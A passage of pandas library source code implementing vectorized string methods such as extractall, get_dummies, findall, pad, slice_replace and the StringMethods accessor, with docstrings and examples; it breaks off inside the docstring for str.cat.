return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
r"""
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
.. versionadded:: 0.18.0
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
regex = re.compile(pat, flags=flags)
# the regex must contain capture groups.
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndexClass):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
result = arr._constructor_expanddim(match_list, index=index, columns=columns)
return result
def str_get_dummies(arr, sep="|"):
"""
Split each string in the Series by sep and return a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
arr = arr.fillna("")
try:
arr = sep + arr + sep
except TypeError:
arr = sep + arr.astype(str) + sep
tags = set()
for ts in arr.str.split(sep):
tags.update(ts)
tags = sorted(tags - {""})
dummies = np.empty((len(arr), len(tags)), dtype=np.int64)
for i, t in enumerate(tags):
pat = sep + t + sep
dummies[:, i] = lib.map_infer(arr.values, lambda x: pat in x)
return dummies, tags
def str_join(arr, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
2 NaN
3 NaN
4 NaN
dtype: object
"""
return _na_map(sep.join, arr)
def str_findall(arr, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
regex = re.compile(pat, flags=flags)
return _na_map(regex.findall, arr)
def str_find(arr, sub, start=0, end=None, side="left"):
"""
Return indexes in each strings in the Series/Index where the
substring is fully contained between [start:end]. Return -1 on failure.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
side : {'left', 'right'}, default 'left'
Specifies a starting side, equivalent to ``find`` or ``rfind``.
Returns
-------
Series or Index
Indexes where substring is found.
"""
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "find"
elif side == "right":
method = "rfind"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_index(arr, sub, start=0, end=None, side="left"):
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "index"
elif side == "right":
method = "rindex"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
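# str_index mirrors str_find above but dispatches to str.index/str.rindex,
# which raise ValueError instead of returning -1 when the substring is absent.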
def str_pad(arr, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills both sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = "fillchar must be a character, not {0}"
raise TypeError(msg.format(type(fillchar).__name__))
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = "width must be of integer type, not {0}"
raise TypeError(msg.format(type(width).__name__))
if side == "left":
f = lambda x: x.rjust(width, fillchar)
elif side == "right":
f = lambda x: x.ljust(width, fillchar)
elif side == "both":
f = lambda x: x.center(width, fillchar)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_split(arr, pat=None, n=None):
if pat is None:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if len(pat) == 1:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if n is None or n == -1:
n = 0
regex = re.compile(pat)
f = lambda x: regex.split(x, maxsplit=n)
res = _na_map(f, arr)
return res
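# Dispatch note for str_split above: a missing or single-character `pat` takes
# the plain str.split fast path, while a longer `pat` is compiled as a regular
# expression; the "no limit" sentinel also differs (-1 for str.split, 0 for
# re.split's maxsplit).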
def str_rsplit(arr, pat=None, n=None):
if n is None or n == 0:
n = -1
f = lambda x: x.rsplit(pat, n)
res = _na_map(f, arr)
return res
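# Hedged illustration (assumed values, not a doctest): splitting from the
# right changes which side keeps the remainder, e.g.
#   pd.Series(['a_b_c']).str.rsplit('_', n=1)  ->  [['a_b', 'c']]
# whereas .str.split('_', n=1) would give [['a', 'b_c']].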
def str_slice(arr, start=None, stop=None, step=None):
"""
Slice substrings from each element in the Series or Index.
Parameters
----------
start : int, optional
Start position for slice operation.
stop : int, optional
Stop position for slice operation.
step : int, optional
Step size for slice operation.
Returns
-------
Series or Index of object
Series or Index from sliced substring from original string object.
See Also
--------
Series.str.slice_replace : Replace a slice with a string.
Series.str.get : Return element at position.
Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
being the position.
Examples
--------
>>> s = pd.Series(["koala", "fox", "chameleon"])
>>> s
0 koala
1 fox
2 chameleon
dtype: object
>>> s.str.slice(start=1)
0 oala
1 ox
2 hameleon
dtype: object
>>> s.str.slice(stop=2)
0 ko
1 fo
2 ch
dtype: object
>>> s.str.slice(step=2)
0 kaa
1 fx
2 caeen
dtype: object
>>> s.str.slice(start=0, stop=5, step=3)
0 kl
1 f
2 cm
dtype: object
Equivalent behaviour to:
>>> s.str[0:5:3]
0 kl
1 f
2 cm
dtype: object
"""
obj = slice(start, stop, step)
f = lambda x: x[obj]
return _na_map(f, arr)
def str_slice_replace(arr, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
if repl is None:
repl = ""
def f(x):
if x[start:stop] == "":
local_stop = start
else:
local_stop = stop
y = ""
if start is not None:
y += x[:start]
y += repl
if stop is not None:
y += x[local_stop:]
return y
return _na_map(f, arr)
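# Edge case handled by `local_stop` above: when the requested slice is empty
# (e.g. start=3, stop=1), `repl` is inserted at `start` instead of replacing
# text up to `stop`.  Rough sketch (assumed values):
#   str_slice_replace(pd.Series(['abcdef']), start=3, stop=1, repl='X')
# gives 'abcXdef'.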
def str_strip(arr, to_strip=None, side="both"):
"""
Strip whitespace (including newlines) from each string in the
Series/Index.
Parameters
----------
to_strip : str or unicode
side : {'left', 'right', 'both'}, default 'both'
Returns
-------
Series or Index
"""
if side == "both":
f = lambda x: x.strip(to_strip)
elif side == "left":
f = lambda x: x.lstrip(to_strip)
elif side == "right":
f = lambda x: x.rstrip(to_strip)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
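# Shared worker for the strip family: the accessor methods below call this
# with side='both' (.str.strip), side='left' (.str.lstrip) and side='right'
# (.str.rstrip).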
def str_wrap(arr, width, **kwargs):
r"""
Wrap long strings in the Series/Index to be formatted in
paragraphs with length less than a given width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
kwargs["width"] = width
tw = textwrap.TextWrapper(**kwargs)
return _na_map(lambda s: "\n".join(tw.wrap(s)), arr)
def str_translate(arr, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
return _na_map(lambda x: x.translate(table), arr)
def str_get(arr, i):
"""
Extract element from each component at specified position.
Extract element from lists, tuples, or strings in each element in the
Series/Index.
Parameters
----------
i : int
Position of element to extract.
Returns
-------
Series or Index
Examples
--------
>>> s = pd.Series(["String",
... (1, 2, 3),
... ["a", "b", "c"],
... 123,
... -456,
... {1: "Hello", "2": "World"}])
>>> s
0 String
1 (1, 2, 3)
2 [a, b, c]
3 123
4 -456
5 {1: 'Hello', '2': 'World'}
dtype: object
>>> s.str.get(1)
0 t
1 2
2 b
3 NaN
4 NaN
5 Hello
dtype: object
>>> s.str.get(-1)
0 g
1 3
2 c
3 NaN
4 NaN
5 None
dtype: object
"""
def f(x):
if isinstance(x, dict):
return x.get(i)
elif len(x) > i >= -len(x):
return x[i]
return np.nan
return _na_map(f, arr)
def str_decode(arr, encoding, errors="strict"):
"""
Decode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode` in
python3.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
Series or Index
"""
if encoding in _cpython_optimized_decoders:
# CPython optimized implementation
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
return _na_map(f, arr)
def str_encode(arr, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
if encoding in _cpython_optimized_encoders:
# CPython optimized implementation
f = lambda x: x.encode(encoding, errors)
else:
encoder = codecs.getencoder(encoding)
f = lambda x: encoder(x, errors)[0]
return _na_map(f, arr)
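# Hedged round-trip example (assumed values, not a doctest): through the
# accessor, pd.Series(['a']).str.encode('utf-8') produces bytes, and chaining
# .str.decode('utf-8') recovers the original strings.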
def forbid_nonstring_types(forbidden, name=None):
"""
Decorator to forbid specific types for a method of StringMethods.
For calling `.str.{method}` on a Series or Index, it is necessary to first
initialize the :class:`StringMethods` object, and then call the method.
However, different methods allow different input types, and so this can not
be checked during :meth:`StringMethods.__init__`, but must be done on a
per-method basis. This decorator exists to facilitate this process, and
make it explicit which (inferred) types are disallowed by the method.
:meth:`StringMethods.__init__` allows the *union* of types its different
methods allow (after skipping NaNs; see :meth:`StringMethods._validate`),
namely: ['string', 'empty', 'bytes', 'mixed', 'mixed-integer'].
The default string types ['string', 'empty'] are allowed for all methods.
For the additional types ['bytes', 'mixed', 'mixed-integer'], each method
then needs to forbid the types it is not intended for.
Parameters
----------
forbidden : list-of-str or None
List of forbidden non-string types, may be one or more of
`['bytes', 'mixed', 'mixed-integer']`.
name : str, default None
Name of the method to use in the error message. By default, this is
None, in which case the name from the method being wrapped will be
copied. However, for working with further wrappers (like _pat_wrapper
and _noarg_wrapper), it is necessary to specify the name.
Returns
-------
func : wrapper
The method to which the decorator is applied, with an added check that
enforces the inferred type to not be in the list of forbidden types.
Raises
------
TypeError
If the inferred type of the underlying data is in `forbidden`.
"""
# deal with None
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
"Cannot use .str.{name} with values of inferred dtype "
"{inf_type!r}.".format(
name=func_name, inf_type=self._inferred_dtype
)
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
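# Minimal usage sketch for the decorator above (hypothetical method name, not
# part of this module):
#
#   @forbid_nonstring_types(["bytes"], name="shout")
#   def shout(self):
#       return self._wrap_result(_na_map(lambda x: x.upper(), self._parent))
#
# Calling .str.shout() on bytes-dtype data would then raise the TypeError
# constructed in `wrapper` above.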
def _noarg_wrapper(f, name=None, docstring=None, forbidden_types=["bytes"], **kargs):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper(self):
result = _na_map(f, self._parent, **kargs)
return self._wrap_result(result)
wrapper.__name__ = f.__name__ if name is None else name
if docstring is not None:
wrapper.__doc__ = docstring
else:
raise ValueError("Provide docstring")
return wrapper
def _pat_wrapper(
f, flags=False, na=False, name=None, forbidden_types=["bytes"], **kwargs
):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper1(self, pat):
result = f(self._parent, pat)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper2(self, pat, flags=0, **kwargs):
result = f(self._parent, pat, flags=flags, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper3(self, pat, na=np.nan):
result = f(self._parent, pat, na=na)
return self._wrap_result(result)
wrapper = wrapper3 if na else wrapper2 if flags else wrapper1
wrapper.__name__ = f.__name__ if name is None else name
if f.__doc__:
wrapper.__doc__ = f.__doc__
return wrapper
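# The flags/na switches select the wrapper signature: for example, the class
# below uses _pat_wrapper(str_count, flags=True) for .str.count (pat + flags)
# and _pat_wrapper(str_startswith, na=True) for .str.startswith (pat + na).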
def copy(source):
"Copy a docstring from another source function (if present)"
def do_copy(target):
if source.__doc__:
target.__doc__ = source.__doc__
return target
return do_copy
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index. NAs stay NA unless
handled otherwise by a particular method. Patterned after Python's string
methods, with some inspiration from R's stringr package.
Examples
--------
>>> s.str.split('_')
>>> s.str.replace('_', '')
"""
def __init__(self, data):
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data)
# .values.categories works for both Series/Index
self._parent = data.values.categories if self._is_categorical else data
# save orig to blow up categoricals to the right type
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
"""
Auxiliary function for StringMethods, infers and checks dtype of data.
This is a "first line of defence" at the creation of the StringMethods-
object (see _make_accessor), and just checks that the dtype is in the
*union* of the allowed types over all string methods below; this
restriction is then refined on a per-method basis using the decorator
@forbid_nonstring_types (more info in the corresponding docstring).
This really should exclude all series/index with any non-string values,
but that isn't practical for performance reasons until we have a str
dtype (GH 9343 / 13877)
Parameters
----------
data : The content of the Series
Returns
-------
dtype : inferred dtype of data
"""
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, " "not MultiIndex"
)
# see _libs/lib.pyx for list of inferred types
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data) # Series / Index
values = getattr(values, "categories", values) # categorical / normal
try:
inferred_dtype = lib.infer_dtype(values, skipna=True)
except ValueError:
# GH#27571 mostly occurs with ExtensionArray
inferred_dtype = None
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string " "values!")
return inferred_dtype
def __getitem__(self, key):
if isinstance(key, slice):
return self.slice(start=key.start, stop=key.stop, step=key.step)
else:
return self.get(key)
def __iter__(self):
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self, result, use_codes=True, name=None, expand=None, fill_value=np.nan
):
from pandas import Index, Series, MultiIndex
# for category, we do the stuff on the categories, so blow it up
# to the full series again
# But for some operations, we have to do the stuff on the full values,
# so make it possible to skip this step as the method already did this
# before the transformation...
if use_codes and self._is_categorical:
# if self._orig is a CategoricalIndex, there is no .cat-accessor
result = take_1d(
result, Series(self._orig, copy=False).cat.codes, fill_value=fill_value
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
return result
assert result.ndim < 3
if expand is None:
# infer from ndim if expand is not specified
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, Index):
# required when expand=True is explicitly specified
# not needed when inferred
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
# propagate nan values to match longest sequence (GH 18450)
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
# if expand is False, result should have the same name
# as the original otherwise specified
if name is None:
name = getattr(result, "name", None)
if name is None:
# do not use logical or, _orig may be a DataFrame
# which has "name" column
name = self._orig.name
# Wait until we are sure result is a Series or Index before
# checking attributes (GH 12180)
if isinstance(self._orig, Index):
# if result is a boolean np.array, return the np.array
# instead of wrapping it into a boolean Index (GH 8875)
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
# We had all tuples of length-one, which are
# better represented as a regular Index.
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
if expand:
cons = self._orig._constructor_expanddim
return cons(result, columns=name, index=index)
else:
# Must be a Series
cons = self._orig._constructor
return cons(result, name=name, index=index)
def _get_series_list(self, others, ignore_index=False):
"""
Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
into a list of Series (elements without an index must match the length
of the calling Series/Index).
Parameters
----------
others : Series, Index, DataFrame, np.ndarray, list-like or list-like
of objects that are Series, Index or np.ndarray (1-dim)
ignore_index : boolean, default False
Determines whether to forcefully align others with index of caller
Returns
-------
tuple : (others transformed into list of Series,
boolean whether FutureWarning should be raised)
"""
# Once str.cat defaults to alignment, this function can be simplified;
# will not need `ignore_index` and the second boolean output anymore
from pandas import Index, Series, DataFrame
# self._orig is either Series or Index
idx = self._orig if isinstance(self._orig, Index) else self._orig.index
err_msg = (
"others must be Series, Index, DataFrame, np.ndarray or "
"list-like (either containing only strings or containing "
"only objects of type Series/Index/list-like/np.ndarray)"
)
# Generally speaking, all objects without an index inherit the index
# `idx` of the calling Series/Index - i.e. must have matching length.
# Objects with an index (i.e. Series/Index/DataFrame) keep their own
# index, *unless* ignore_index is set to True.
if isinstance(others, Series):
warn = not others.index.equals(idx)
# only reconstruct Series when absolutely necessary
los = [
Series(others.values, index=idx) if ignore_index and warn else others
]
return (los, warn)
elif isinstance(others, Index):
warn = not others.equals(idx)
los = [Series(others.values, index=(idx if ignore_index else others))]
return (los, warn)
elif isinstance(others, DataFrame):
warn = not others.index.equals(idx)
if ignore_index and warn:
# without copy, this could change "others"
# that was passed to str.cat
others = others.copy()
others.index = idx
return ([others[x] for x in others], warn)
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return ([others[x] for x in others], False)
elif is_list_like(others, allow_sets=False):
others = list(others) # ensure iterators do not get read twice etc
# in case of list-like `others`, all elements must be
# either one-dimensional list-likes or scalars
if all(is_list_like(x, allow_sets=False) for x in others):
los = []
join_warn = False
depr_warn = False
# iterate through list and append list of series for each
# element (which we check to be one-dimensional and non-nested)
while others:
nxt = others.pop(0) # nxt is guaranteed list-like by above
# GH 21950 - DeprecationWarning
# only allowing Series/Index/np.ndarray[1-dim] will greatly
# simplify this function post-deprecation.
if not (
isinstance(nxt, (Series, Index))
or (isinstance(nxt, np.ndarray) and nxt.ndim == 1)
):
depr_warn = True
if not isinstance(nxt, (DataFrame, Series, Index, np.ndarray)):
# safety for non-persistent list-likes (e.g. iterators)
# do not map indexed/typed objects; info needed below
nxt = list(nxt)
# known types for which we can avoid deep inspection
no_deep = (
isinstance(nxt, np.ndarray) and nxt.ndim == 1
) or isinstance(nxt, (Series, Index))
# nested list-likes are forbidden:
# -> elements of nxt must not be list-like
is_legal = (no_deep and nxt.dtype == object) or all(
not is_list_like(x) for x in nxt
)
# DataFrame is false positive of is_legal
# because "x in df" returns column names
if not is_legal or isinstance(nxt, DataFrame):
raise TypeError(err_msg)
nxt, wnx = self._get_series_list(nxt, ignore_index=ignore_index)
los = los + nxt
join_warn = join_warn or wnx
if depr_warn:
warnings.warn(
"list-likes other than Series, Index, or "
"np.ndarray WITHIN another list-like are "
"deprecated and will be removed in a future "
"version.",
FutureWarning,
stacklevel=4,
)
return (los, join_warn)
elif all(not is_list_like(x) for x in others):
return ([Series(others, index=idx)], False)
raise TypeError(err_msg)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join=None):
"""
Concatenate strings in the Series/Index with given separator.
If `others` is specified, this function concatenates the Series/Index
and elements of `others` element-wise.
If `others` is not passed, then all values in the Series/Index are
concatenated into a single string with a given `sep`.
Parameters
----------
others : Series, Index, DataFrame, np.ndarray or list-like
Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
other list-likes of strings must have the same length as the
calling Series/Index, with the exception of indexed objects (i.e.
Series/Index/DataFrame) if `join` is not None.
If others is a list-like that contains a combination of Series,
Index or np.ndarray (1-dim), then all elements will be unpacked and
must satisfy the above criteria individually.
If others is None, the method returns the concatenation of all
strings in the calling Series/Index.
sep : str, default ''
The separator between the different elements/columns. By default
the empty string `''` is used.
na_rep : str or None, default None
Representation that is inserted for all missing values:
- If `na_rep` is None, and `others` is None, missing values in the
Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row containing a
missing value in any of the columns (before concatenation) will
have a missing value in the result.
join : {'left', 'right', 'outer', 'inner'}, default None
Determines the join-style between the calling Series/Index and any
Series/Index/DataFrame in `others` (objects without an index need
to match the length of the calling Series/Index). If None,
alignment is disabled, but this option will be removed in a future
version of pandas and replaced with a default of `'left'`. To
disable alignment, use `.values` on any Series/Index/DataFrame in
`others`.
.. versionadded:: 0.23.0
Returns
-------
str, Series or Index
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of objects is returned.
See Also
--------
split : Split each string in the Series/Index.
join : Join lists contained as elements in the Series/Index.
Examples
--------
When not passing `others`, all values are concatenated into a single
string:
>>> s = pd.Series(['a', 'b', np.nan, 'd'])
>>> s.str.cat(sep=' ')
'a b d'
By default, NA values in the Series are ignored. Using `na_rep`, they
can be given a representation:
>>> s.str.cat(sep=' ', na_rep='?')
'a b ? d'
If `others` is specified, corresponding values are concatenated with
the separator. Result will be a Series of strings.
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
0 a,A
1 b,B
2 NaN
3 d,D
dtype: object
Missing values will remain missing in the result, but can again be
represented using `na_rep`
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
0 a,A
1 b,B
2 -,C
3 d,D
dtype: object
If `sep` is not specified, the values are concatenated without
separation.
>>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
0 aA
1 bB
2 -C
3 dD
dtype: object
Series with different indexes can be aligned before concatenation. The
`join`-keyword works as in other methods.
>>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
>>> s.str.cat(t, join='left', na_rep='-')
0 aa
